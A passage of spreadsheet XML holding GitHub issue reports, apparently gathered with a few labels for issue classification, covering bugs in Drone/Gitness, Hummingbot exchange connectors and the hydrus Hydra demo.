  </si>
  <si>
    <t>expose errors in oauth2 authorization code grant</t>
  </si>
  <si>
    <t>Right now when the oauth2 provider (ie Bitbucket) fails to grant an authorization code an `error` query parameter is returned, as defined in the oauth2 specification: https://tools.ietf.org/html/rfc6749#section-4.1.2.1 Drone currently looks for the `code` and re-directs, without checking for the `error` query parameter. In error scenarios (misconfiguration for example) this can result in redirect loops, and by not catching and exposing the error it can be difficult to debug. We should therefore start catching and returning the error. This is the block of code: https://github.com/drone/drone/blob/master/remote/bitbucket/bitbucket.go#L46:L50 Which could be adjusted to something like this:  diff package bitbucket import ( + "errors" "fmt" "net/http" "net/url"   diff code := r.FormValue("code") + if err := r.FormValue("error"); err != "" { + return nil, errors.New(err) + } if len(code) == 0 { http.Redirect(w, r, config.AuthCodeURL("drone"), http.StatusSeeOther) return nil, nil }  Note that this should be adjusted in both the GitHub and Bitbucket implementations.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2010</t>
  </si>
  <si>
    <t>Show errors on webhooks in user interface</t>
  </si>
  <si>
    <t>I had a wrong indent in my .drone.yml. This resulted in a very unclear HTTP 400 response from Drone on my webhook in Bitbucket. I can figure 2 solutions: - either add the error to the HTTP 400 response - or show an attempted build in the user interface of Drone with what's going on</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2047</t>
  </si>
  <si>
    <t>Restarted build doesn't get correct {{build.link}}</t>
  </si>
  <si>
    <t>The build only gets correct {{build.link}} when first run, after which {{build.link}} will use `localhost` instead the correct host url</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2154</t>
  </si>
  <si>
    <t>Drone server failed to unmarshal webhook payload from Gogs (labels are present)</t>
  </si>
  <si>
    <t>Steps to reproduce: 1. Create PR with labels. 2. See drone-server logs. These errors are found there in my case:  drone-server_1 | time="2017-08-07T06:00:10Z" level=error msg="failure to parse hook. json: cannot unmarshal object into Go struct field .labels of type string" drone-server_1 | time="2017-08-07T06:00:10Z" level=error msg="Error #01: json: cannot unmarshal object into Go struct field .labels of type string\n" ip=89.188.125.8 latency=16.784072ms method=POST path="/hook" status=400 time="2017-08-07T06:00:10Z" user-agent=GogsServer  3. See "labels" section of payload (can be found in webhook edit page in Gogs). In my case: json "labels": [ { "id": 268, "name": "component/library", "color": "7614de", "url": "" } ],  It seems like drone webhook processing function works incorrectly, somewhere around [this](https://github.com/drone/drone/blob/c8313f8cd8b398becaa46563121a4c5526b1081a/server/hook.go#L324) line. Gitter discussion is [here](https://gitter.im/drone/drone?at=59887a8845fc670746015e41).</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2193</t>
  </si>
  <si>
    <t>Panic when trying to read non-existent vault secret</t>
  </si>
  <si>
    <t xml:space="preserve">If you try to reference a vault secret that does not exist in vault, drone will then panic and put the build in a forever pending state. This is with `drone/drone:0.8.0`. The stack trace:  Sep 5 21:46:11 drone6-server drone6[6307]: runtime error: invalid memory address or nil pointer dereference Sep 5 21:46:11 drone6-server drone6[6307]: /usr/local/go/src/runtime/panic.go:489 (0x42f29f) Sep 5 21:46:11 drone6-server drone6[6307]: /usr/local/go/src/runtime/panic.go:63 (0x42e14e) Sep 5 21:46:11 drone6-server drone6[6307]: /usr/local/go/src/runtime/signal_unix.go:290 (0x44430f) Sep 5 21:46:11 drone6-server drone6[6307]: /go/src/github.com/drone/drone/extras/secrets/vault.go:93 (0xa160c6) Sep 5 21:46:11 drone6-server drone6[6307]: /go/src/github.com/drone/drone/extras/secrets/vault.go:52 (0xa15c53) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/server/hook.go:222 (0x96871e) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/context.go:97 (0x8baa1a) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/router/middleware/token/token.go:17 (0x8d3ff0) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/context.go:97 (0x8baa1a) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/router/middleware/session/user.go:68 (0x8d3492) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/context.go:97 (0x8baa1a) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/router/middleware/store.go:15 (0x9cd767) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/context.go:97 (0x8baa1a) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/contrib/ginrus/ginrus.go:26 (0x9cdbbf) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/context.go:97 (0x8baa1a) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/router/middleware/header/header.go:25 (0x8cb040) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/context.go:97 (0x8baa1a) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/router/middleware/header/header.go:17 (0x8cafe9) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/context.go:97 (0x8baa1a) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/recovery.go:45 (0x8c8caa) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/context.go:97 (0x8baa1a) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/gin.go:284 (0x8c0850) Sep 5 21:46:12 drone6-server drone6[6307]: /go/src/github.com/drone/drone/vendor/github.com/gin-gonic/gin/gin.go:265 (0x8c016b) Sep 5 21:46:12 drone6-server drone6[6307]: /usr/local/go/src/net/http/server.go:2568 (0x6ceb92) Sep 5 21:46:12 drone6-server drone6[6307]: /usr/local/go/src/net/http/server.go:1825 (0x6cad32) Sep 5 21:46:12 drone6-server drone6[6307]: /usr/local/go/src/runtime/asm_amd64.s:2197 (0x45dda1) </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2251</t>
  </si>
  <si>
    <t>/api/info/queue reports running_count &gt; 0 when there are no running builds</t>
  </si>
  <si>
    <t xml:space="preserve">version 0.7.3+build.1139 I observe the following: /api/info/queue returns  { "pending": null, "running": [ { "id": "191", "data": "", "labels": { "platform": "linux/amd64" } }, { "id": "171", "data": "", "labels": { "platform": "linux/amd64" } }, { "id": "199", "data": "", "labels": { "platform": "linux/amd64" } }, { "id": "183", "data": "", "labels": { "platform": "linux/amd64" } }, { "id": "203", "data": "", "labels": { "platform": "linux/amd64" } }, { "id": "195", "data": "", "labels": { "platform": "linux/amd64" } } ], "stats": { "worker_count": 12, "pending_count": 0, "running_count": 6, "completed_count": 0 } }  Note `"running_count": 6` But there are no builds, and /api/builds doesn't report any:  [] </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2475</t>
  </si>
  <si>
    <t>BUG: Gitea integration sending wrong URLs to Gitea</t>
  </si>
  <si>
    <t>First of all this is a copy of my bug report which got automaticly closed (https://github.com/drone/drone/issues/2470). Secondly @bradrydzewski said I should report this on https://discourse.drone.io/ - Since then my account didn't get approved so I'm opening this issue a second time. I am running a drone ci instance using the following docker-compose.yml  version: '2' networks: drone: external: false proxy: external: name: proxy services: drone-server: image: drone/drone:0.8 expose: - 8000 - 9000 volumes: - ./drone:/var/lib/drone/ restart: always networks: - proxy - drone environment: - DRONE_OPEN=true - DRONE_HOST={{REMOVED}} - DRONE_SECRET={{REMOVED}}D - DRONE_GITEA=true - DRONE_GITEA_URL={{REMOVED}} - DRONE_GITEA_GIT_USERNAME=Drone - DRONE_GITEA_GIT_PASSWORD={{REMOVED}} - DRONE_GITEA_PRIVATE_MODE=true drone-agent: image: drone/agent:0.8 command: agent restart: always networks: - drone depends_on: - drone-server volumes: - /var/run/docker.sock:/var/run/docker.sock environment: - DRONE_SERVER=drone-server:9000 - DRONE_SECRET={{REMOVED}}  After pushing into a activated repository Gitea shows the build status. ![Example image](https://user-images.githubusercontent.com/11004008/44058996-32bb097a-9f50-11e8-9d06-65a1e2cc26cb.png "Example image") If the build succeeded the URL is working as expected (Redirecting to the defined DRONE_HOST) But if a build is still pending or fails the URL redirects to http://drone-server:8000/ I don't think this is an intended behavior. If you need any other details or configuration, let me know.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2524</t>
  </si>
  <si>
    <t>1.0.0.-rc.1 agent - invalid character '&lt;' looking for beginning of value</t>
  </si>
  <si>
    <t>Running agent rc.1 throws the following error in logs **{"level":"error","error":"invalid character '&lt;' looking for beginning of value","platform":"linux/amd64","time":"2018-11-11T20:07:46Z","message":"cannot get queue item"}** Happens regardless of specified platform</t>
  </si>
  <si>
    <t xml:space="preserve">disscued on call it bugs becaused of the fiiles modified </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2525</t>
  </si>
  <si>
    <t>Running agent rc.1 throws the following error in logs {"level":"error","error":"invalid character '&lt;' looking for beginning of value","platform":"linux/amd64","time":"2018-11-11T20:07:46Z","message":"cannot get queue item"} the agent call the rpc service "POST /rpc/v1/request" response "&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=/favicon.png&gt;&lt;title&gt;Drone | Continuous Integration&lt;/title&gt;&lt;link href=/css/app.b667b0e1.css rel=preload as=style&gt;&lt;link href=/js/app.28abcb1f.js rel=preload as=script&gt;&lt;link href=/js/chunk-vendors.6bc2aeab.js rel=preload as=script&gt;&lt;link href=/css/app.b667b0e1.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but Drone does not work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=/js/chunk-vendors.6bc2aeab.js&gt;&lt;/script&gt;&lt;script src=/js/app.28abcb1f.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;"</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2538</t>
  </si>
  <si>
    <t>Missing usefull error message on login fail</t>
  </si>
  <si>
    <t>Logging in with a unverified email address fails with generic error message. The server log states:  time="2018-11-30T07:55:31Z" level=error msg="cannot authenticate user. No verified Email address for GitHub account"  It would be very helpful to display this message to the user.</t>
  </si>
  <si>
    <t>th fix modifys the controller</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2566</t>
  </si>
  <si>
    <t>Unable to fetch stage details when using string interpolation in pipeline</t>
  </si>
  <si>
    <t>I added the following in my `.drone.yml`: yaml environment: build_number: ${BUILD_NUMBER}  and this shows up in my logs: yaml {"commit":"bd36d59f700cdf217d8efc030ebe3d4dec7b4fc0","event":"push","level":"debug","msg":"webhook parsed","name":"bazare-public","namespace":"tjimsk","time":"2019-01-04T21:15:04Z"} {"commit":"bd36d59f700cdf217d8efc030ebe3d4dec7b4fc0","event":"push","level":"debug","msg":"trigger: received","ref":"refs/heads/master","repo":"&lt;repository-name&gt;","time":"2019-01-04T21:15:04Z"} {"fields.time":"2019-01-04T21:15:06Z","latency":1589002566,"level":"debug","method":"POST","msg":"","remote":"10.28.3.5:51760","request":"/hook","request-id":"596a9389-0fe3-4f72-b3c8-a815e94c1e15","time":"2019-01-04T21:15:06Z"} {"level":"debug","machine":"drone-74666b56c4-lqt8k","msg":"manager: accept stage","stage-id":2,"time":"2019-01-04T21:15:06Z"} {"level":"debug","machine":"drone-74666b56c4-lqt8k","msg":"manager: stage accepted","stage-id":2,"time":"2019-01-04T21:15:06Z"} {"level":"debug","msg":"manager: fetching stage details","step-id":2,"time":"2019-01-04T21:15:06Z"} {"arch":"amd64","build":2,"error":"runtime error: invalid memory address or nil pointer dereference","level":"error","machine":"drone-74666b56c4-lqt8k","msg":"runner: unexpected panic","os":"linux","pipeline":"public","repo":"&lt;repository-name&gt;","stage":1,"time":"2019-01-04T21:15:06Z"} {"arch":"amd64","level":"debug","machine":"drone-74666b56c4-lqt8k","msg":"runner: polling queue","os":"linux","time":"2019-01-04T21:15:06Z"} {"arch":"amd64","kernel":"","level":"debug","msg":"manager: request queue item","os":"linux","time":"2019-01-04T21:15:06Z","variant":""} {"level":"debug","msg":"events: stream eror","request-id":"729b25b5-260a-457c-be9e-f1b51bb7b4dc","time":"2019-01-04T21:16:12Z","user.admin":true,"user.login":"tjimsk"} {"level":"debug","msg":"events: stream closed","request-id":"729b25b5-260a-457c-be9e-f1b51bb7b4dc","time":"2019-01-04T21:16:12Z","user.admin":true,"user.login":"tjimsk"}  The pipeline gets stuck instead of reporting it can't find the variable. That should be handled better as even the logs don't really say that much.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2643</t>
  </si>
  <si>
    <t>Issue with sub-projects with Gitlab</t>
  </si>
  <si>
    <t>When not using sub projects Drone is fine when we try activation Drone with a sub-project we get a 404 error as follows. {"admin":false,"error":"404 Project Not Found","level":"warning","msg":"api: cannot sync repository permissions","name":"android-pipeline-test","namespace":"android","read":true,"request-id":"1JPTXf4qtGu0Uo5qJ9G4VQuGBby","time":"2019-04-04T16:36:13Z","user.login":"drone.ci","write":false}</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2650</t>
  </si>
  <si>
    <t>Can't activate a repository from Bitbucket private account</t>
  </si>
  <si>
    <t>**Configuration:** Private bitbucket account Host: Ubuntu 18.04.2 LTS Docker version: 18.09.4 Docker run command for drone:  docker run \ --volume=/drone/data:/data \ --env=DRONE_BITBUCKET_CLIENT_ID= \ --env=DRONE_BITBUCKET_CLIENT_SECRET= \ --env=DRONE_RPC_SECRET= \ --env=DRONE_SERVER_HOST=our.domain.io \ --env=DRONE_SERVER_PROTO=http \ --env=DRONE_TLS_AUTOCERT=false \ --publish=80:80 \ --publish=443:443 \ --restart=always \ --detach=true \ --name=drone-server \ drone/drone:1  Issue steps: 1. Go to our drone url: our.domain.io 2. See the list of repositories (good) 3. Click on one repo 4. Click on 'activate' Expected: 1. connect to the repo for configuration actual: Get GUI message: "There was a problem enabling your repository. Not Found." Details from Chrome console: Request URL: http://our.domain.io/api/repos/project/reponame Request Method: POST Status Code: 404 Not Found Remote Address: xx.xx.xx.xx:80 Referrer Policy: no-referrer-when-downgrade</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2710</t>
  </si>
  <si>
    <t>Sync Gitlab project in subgroups KO</t>
  </si>
  <si>
    <t xml:space="preserve">When you try to access on Gitlab sub-group project, the Ui respond 404 and the API respond: </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2763</t>
  </si>
  <si>
    <t>Drone 1.X: Secrets per image</t>
  </si>
  <si>
    <t>In drone 0.8 there was possibility to add Secrets scoped to certain images. This would allow only trusted images to use secrets. Now in Drone 1.0 when i try add secret for image i am getting following error:  flag provided but not defined: -image  This allows everyone to create a custom image and read all the secrets from it by putting them in **.drone.yml** file which can be considered as a security issue.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2766</t>
  </si>
  <si>
    <t>Github usernames case sensitivity</t>
  </si>
  <si>
    <t>Not sure how github handles usernames, but I seem to get logged in als "Niondir" in drone but in an earlier version it was "niondir". Now my admin permissions were missing, I just found out by looking into the database. If usernames on github are not case-sensitive, you should sanitize them in the database.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2776</t>
  </si>
  <si>
    <t>Gitlab 'merged' webhook is ignored</t>
  </si>
  <si>
    <t>Assessing the new `action` added in this issue [issue](https://github.com/drone/drone/issues/2685) condition, it seems like `merged` webhooks (hooks firing from gitlab when the repository is merged ) are ignored in drone. That means: - The repository is properly integrated with drone - Hooks are fired and a 200 response is received from drone. - Drone logs show no recollection of handling the `merged` hook (as opposed to `opened` hooks, which are properly evaluated) - Using debug logging, I get this message:  {"fields.time":"2019-08-05T14:37:51Z","latency":625401,"level":"debug","method":"POST","msg":"","remote":"172.18.0.1:37804","request":"/hook","request-id":"1P0fKgKxws4QTAmMxVIWV23bHJY","time":"2019-08-05T14:37:51Z"}  I have specific interest to act on this merged event, rather then use the push event fired on the target branch. Any help will be much advised.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2943</t>
  </si>
  <si>
    <t>drone orgsecret rm 404</t>
  </si>
  <si>
    <t>I use `drone orgsecret add daocloud.io docker_password my_password` successfully. But when rm orgsecret, it said 404. ![image](https://user-images.githubusercontent.com/1883728/77022090-a1a97d00-69c3-11ea-9298-a22a07e3a29b.png)</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/2977</t>
  </si>
  <si>
    <t>No completed webhook sent</t>
  </si>
  <si>
    <t>Based on the [docs](https://docs.drone.io/webhooks/examples/#completed) there should be a webhook with a completed action. Saw [this](https://github.com/drone/drone/pull/2923) PR about implementing it. Am I missing something, or it is really not implemented correctly?</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/3010</t>
  </si>
  <si>
    <t>can not Sync Gitlab project in subgroups</t>
  </si>
  <si>
    <t>today i upgrade drone to last version but aslo cant sync project in subgroups  before upgrade ,the web page of " repo list " can show the project but after upgrade,it not display in the list</t>
  </si>
  <si>
    <t xml:space="preserve">
not_bug</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/3274</t>
  </si>
  <si>
    <t>gitea oauth: cannot exchange code</t>
  </si>
  <si>
    <t>gitea: version [1.17.2] drone log:  {"level":"error","msg":"oauth: cannot exchange code: gta_xxxxxx: : "  gitea log:  GET /login/oauth/access_token for 111.22.248.4:0, 405 Method Not Allowed  look [gitea oauth2-provider.md](https://github.com/go-gitea/gitea/blob/711cbcce8d6a193f5738c45861d11cb86b412ec7/docs/content/doc/developers/oauth2-provider.md) Need to change GET to POST</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/3402</t>
  </si>
  <si>
    <t>Can't import repository from GitHub</t>
  </si>
  <si>
    <t>Hi team, trying to import a Spring Petclinic repo (https://github.com/spring-projects/spring-petclinic.git) in Gitness and no luck. This query fails with HTTP 400: http://localhost:3000/api/v1/repos/import Request: `{"description":"","parent_ref":"spring-petclinic","uid":"spring-petclinic.git","provider":{"type":"github","username":"","password":""},"provider_repo":"spring-projects/spring-petclinic.git"}` Video: https://www.youtube.com/watch?v=v4x6G4BwxhA</t>
  </si>
  <si>
    <t>? enhancement</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/3416</t>
  </si>
  <si>
    <t>login error Not Found</t>
  </si>
  <si>
    <t xml:space="preserve">Gitness cannot log in again after running for a period of time, account lost  docker run -d --name gitness --restart always \ -e GITNESS_PRINCIPAL_ADMIN_PASSWORD=gitness \ -e GITNESS_USER_SIGNUP_ENABLED=false \ -p 3000:3000 \ -v /var/run/docker.sock:/var/run/docker.sock \ -v /data/gitness:/data \ harness/gitness </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/3420</t>
  </si>
  <si>
    <t>Sending commits via API</t>
  </si>
  <si>
    <t>I am having problems sending commits via api I am using the following Endpoint [POST] /api/v1/repos/{repo}/commits The response i am getting is: json { "message": "sha does not match for path README.md [given: 3d84e33764a95d00f5b1d4a7c8362580e4fad381, expected: 73a4f96320a42cc62d0271e62aad9213ff165ff1]" }  If it knows the sha already why do we have to send it? Would it be possible to remove the necessity of sending sha in the request?</t>
  </si>
  <si>
    <t>https://github.com/hummingbot/hummingbot/issues/5251</t>
  </si>
  <si>
    <t>Binance market order without price fail with illegal characters</t>
  </si>
  <si>
    <t>**Describe the bug** New market orders to Binance without a price (which is optional) fail with illegal characters because price is being submitted as string NaN. **Steps To Reproduce** Create a custom strategy that utilises market orders and attempt to submit a market order without a price e.g `if side == 'buy': order_id = self.buy_with_specific_market( market_trading_pair_tuple=self._market_info, amount=self._order_amount, order_type=OrderType.MARKET )` Here are the steps to reproduce the issue (see attachments in the section below): 1. Set up your configuration file with these parameters:  2. Start the bot using this command:   **Release version** v1.3.0 **Error Message** `{2022-04-24 03:02:10,118 - 28767 - hummingbot.connector.exchange.binance.binance_exchange - NETWORK - Error submitting SELL MARKET order to Binance for 0.00020000 BTC-AUD NaN. Traceback (most recent call last): File "/opt/hummingbot/hummingbot/connector/exchange/binance/binance_exchange.py", line 526, in _create_order order_result = await self._api_request( File "/opt/hummingbot/hummingbot/connector/exchange/binance/binance_exchange.py", line 1010, in _api_request return await web_utils.api_request( File "/opt/hummingbot/hummingbot/connector/exchange/binance/binance_web_utils.py", line 113, in api_request raise IOError(f"The request to Binance failed. Error: {error_response}. Request: {request}") OSError: The request to Binance failed. Error: {"code":-1100,"msg":"Illegal characters found in parameter 'price'; legal range is '^([0-9]{1,20})(\\.[0-9]{1,20})?$'."}. Request: RESTRequest(method=POST, url='https://api.binance.com/api/v3/order', params=None, data={'symbol': 'BTCAUD', 'side': 'SELL', 'quantity': '0.00020000', 'type': 'MARKET', 'newClientOrderId': 'x-XEKWYICXSBCAD1805984ff5179a47b1306', 'price': 'NaN'}, headers={'Content-Type': 'application/json'}, is_auth_required=True, throttler_limit_id='/order') 2022-04-24 03:02:10,119 - 28767 - hummingbot.connector.exchange.binance.binance_exchange - WARNING - The request to Binance failed. Error: {"code":-1100,"msg":"Illegal characters found in parameter 'price'; legal range is '^([0-9]{1,20})(\\.[0-9]{1,20})?$'."}. Request: RESTRequest(method=POST, url='https://api.binance.com/api/v3/order', params=None, data={'symbol': 'BTCAUD', 'side': 'SELL', 'quantity': '0.00020000', 'type': 'MARKET', 'newClientOrderId': 'x-XEKWYICXSBCAD1805984ff5179a47b1306', 'price': 'NaN'}, headers={'Content-Type': 'application/json'}, is_auth_required=True, throttler_limit_id='/order') 2022-04-24 03:02:10,120 - 28767 - hummingbot.core.event.event_reporter - EVENT_LOG - {"timestamp": 1650769330.0, "order_id": "x-XEKWYICXSBCAD1805984ff5179a47b1306", "order_type": "OrderType.MARKET", "event_name": "MarketOrderFailureEvent", "event_source": "binance"} 2022-04-24 03:02:10,120 - 28767 - hummingbot.connector.client_order_tracker - INFO - Order x-XEKWYICXSBCAD1805984ff5179a47b1306 has failed. Order Update: OrderUpdate(trading_pair='BTC-AUD', update_timestamp=1650769330.0, new_state=&lt;OrderState.FAILED: 6&gt;, client_order_id='x-XEKWYICXSBCAD1805984ff5179a47b1306', exchange_order_id=None)` *WARNING: Do NOT publish any exchange API keys or your wallet's private key. Whoever has access to them may steal your assets!* **discord username:** J0E</t>
  </si>
  <si>
    <t>https://github.com/hummingbot/hummingbot/issues/5273</t>
  </si>
  <si>
    <t>KuCoin : Could not fetch new trading fees from Kucoin. Filling log file and too many API calls</t>
  </si>
  <si>
    <t>**Describe the bug** Upgraded two robots to Ubuntu 22.04 LTS and Hummingbot 1.3.0 , when I start the robot, the robot creates trades on KuCoin but then starts spamming the log file and API every second with the message "WARNING - Could not fetch new trading fees from Kucoin. Check network connection.". It says "Check network connection" but the network connection is working fine. Then a few lines up it says invalid KC-API-SIGN, yet the robot successfully made orders on KuCoin. When left running, this behavior leads to a full log file and a temporary ban on the KuCoin API. Other projects are having similar issues it looks like: https://github.com/mscheetz/KuCoinApi.Net/issues/13 https://github.com/mscheetz/KuCoinApi.Net/issues/10 **Steps To Reproduce** - Set up a Docker robot with - Ubuntu 22.04 LTS VPS - Snap Docker - Hummingbot 1.3.0 - API Connect to KuCoin - Liquidity Mining strategy - 5 coinpairs - start - observe that the robot creates 5 to 10 orders - observe the robot throwing the warning message - observe the log file filling up rapidly - let run for 24 hours - observe a rate limit temporary ban on the KuCoin API **Screenshots** ![image](https://user-images.githubusercontent.com/10052587/166113851-bbed3e27-a1f8-4228-9fce-003973c8f6d4.png) **Release version** 1.3.0 **Attachments** // Please attach your config file and log file to help us debug. It would be difficult for us to help you without those! `Traceback (most recent call last): File "/home/hummingbot/hummingbot/connector/exchange/kucoin/kucoin_exchange.py", line 767, in _trading_fees_polling_loop await self._update_trading_fees() File "/home/hummingbot/hummingbot/connector/exchange/kucoin/kucoin_exchange.py", line 817, in _update_trading_fees resp = await self._api_request( File "/home/hummingbot/hummingbot/connector/exchange/kucoin/kucoin_exchange.py", line 946, in _api_request return await web_utils.api_request( File "/home/hummingbot/hummingbot/connector/exchange/kucoin/kucoin_web_utils.py", line 107, in api_request raise IOError(f"The request to Kucoin failed. Error: {error_response}. Request: {request}") OSError: The request to Kucoin failed. Error: {"code":"400005","msg":"Invalid KC-API-SIGN"}. Request: RESTRequest(method=GET, url='https://api.kucoin.com/api/v1/trade-fees', endpoint_url=None, params={'symbols': 'ALGO-USDT,AVAX-USDT,DAO-USDT,FEAR-USDT'}, data=None, headers={'Content-Type': 'application/x-www-form-urlencoded'}, is_auth_required=True, throttler_limit_id='/api/v1/trade-fees') 2022-04-30 14:23:29,906 - 1 - hummingbot.connector.exchange.kucoin.kucoin_exchange - WARNING - Could not fetch new trading fees from Kucoin. Check network connection. ` **Optional: your discord username:** Bhagavate bilala#6332</t>
  </si>
  <si>
    <t>https://github.com/HTTP-APIs/hydrus/issues/182</t>
  </si>
  <si>
    <t>Port number is not specified for server endpoint URL</t>
  </si>
  <si>
    <t xml:space="preserve"> I'm submitting a - [x] bug report.  Current Behaviour: The port number is not specified for the API endpoint URL the server is exposed to. It may lead to a scenario where the client is unable to find the server or try to access a different program in the host machine.  Expected Behaviour: The port number of the server endpoint should be specified in the server URL so that client is able to connect to the server without any errors.  Steps to reproduce: - Run an instance of the hydrus server any port (the default `8080` also works) - Access it using a hydra enabled client with specifying the port number (e.g `http:127.0.0.1:8080/localhost` - It will not be able to find the rest of the resources apart from that which is present at `http:127.0.0.1:8080/localhost`  Do you want to work on this issue? yes</t>
  </si>
  <si>
    <t>https://github.com/HTTP-APIs/hydrus/issues/429</t>
  </si>
  <si>
    <t>demo returns incomplete contexts</t>
  </si>
  <si>
    <t xml:space="preserve"> I'm submitting a - [X] bug report.  Current Behaviour: I'm exploring the hydrus demo to understand how Hydra works. From what I understand, the linked JSON-LD contexts do not provide enough information to parse a response as RDF. Requesting the `DroneCollection` returns the following JSON-LD document: jsonc // GET http://localhost:8080/serverapi/DroneCollection { "@context": "/serverapi/contexts/DroneCollection.jsonld", "@id": "/serverapi/DroneCollection/", "@type": "DroneCollection", "members": [], "search": { "@type": "IriTemplate", "mapping": [ { "@type": "IriTemplateMapping", "property": "http://auto.schema.org/speed", "required": false, "variable": "DroneState[Speed]" }, //  ], "template": "/serverapi/Drone(DroneState[Speed], DroneState[Position], DroneState[Direction], DroneState[Battery], DroneState[SensorStatus], DroneState[DroneID], name, model, MaxSpeed, Sensor, pageIndex, limit, offset)", "variableRepresentation": "hydra:BasicRepresentation" }, "totalItems": 0, "view": { "@id": "/serverapi/DroneCollection?page=1", "@type": "PartialCollectionView", "first": "/serverapi/DroneCollection?page=1", "last": "/serverapi/DroneCollection?page=1" } }  However, the linked JSON-LD context does not contain mappings for all the Hydra-specific identifiers: jsonc // GET http://localhost:8080/serverapi/contexts/DroneCollection.jsonld { "@context": { "Drone": "vocab:Drone", "DroneCollection": "vocab:DroneCollection", "hydra": "http://www.w3.org/ns/hydra/core#", "members": "http://www.w3.org/ns/hydra/core#member", "vocab": "http://localhost:8080/serverapi/vocab#" } }  Almost none of the Hydra-identifiers in the response (`search`, `IriTemplate`, `totalItems`, `first`, `last`, etc.) can be mapped to their URIs. The issue becomes obvious, when you paste the JSON-LD along with the JSON-LD context into the JSON-LD playground: http://tinyurl.com/rrq6cc8  Expected Behaviour: Either the JSON-LD context maps all the identifiers to their URIs or the identifiers are prefixed with `hydra:` in the document. E.g. like this: jsonc { "@context": "/serverapi/contexts/DroneCollection.jsonld", "@id": "/serverapi/DroneCollection/", "@type": "DroneCollection", "members": [], "hydra:search": { "@type": "hydra:IriTemplate", "hydra:mapping": [ { "@type": "hydra:IriTemplateMapping", "hydra:property": "http://auto.schema.org/speed", "hydra:required": false, "hydra:variable": "DroneState[Speed]" }, //  ], "hydra:template": "/serverapi/Drone(DroneState[Speed], DroneState[Position], DroneState[Direction], DroneState[Battery], DroneState[SensorStatus], DroneState[DroneID], name, model, MaxSpeed, Sensor, pageIndex, limit, offset)", "hydra:variableRepresentation": "hydra:BasicRepresentation" }, "hydra:totalItems": 0, "hydra:view": { "@id": "/serverapi/DroneCollection?page=1", "@type": "hydra:PartialCollectionView", "hydra:first": "/serverapi/DroneCollection?page=1", "hydra:last": "/serverapi/DroneCollection?page=1" } }  Here's the JSON-LD playground for this document: http://tinyurl.com/r2oje6q The same applies to other responses, e.g. the `Drone` representation, which links to the same JSON-LD context as the collection leaving `MaxSpeed`, `Sensor`, `model` and `name` undefined: jsonc // GET http://localhost:8080/serverapi/DroneCollection/9299bee8-bdc6-4d6f-9f48-f5884b3ef29c { "@context": "/serverapi/contexts/DroneCollection.jsonld", "@id": "/serverapi/DroneCollection/9299bee8-bdc6-4d6f-9f48-f5884b3ef29c", "@type": "Drone", "MaxSpeed": "100", "Sensor": "Temperature", "model": "xyz", "name": "Drone 1" }   Steps to reproduce: - Start the demo according to README - Authenticate - `GET http://localhost:8080/serverapi/DroneCollection` - `GET http://localhost:8080/serverapi/contexts/DroneCollection.jsonld` - Copy/paste both, document and context, into the JSON-LD playground (or click link above)  Do you want to work on this issue? no, I'm not familiar with python and only wanted to learn about Hydra.</t>
  </si>
  <si>
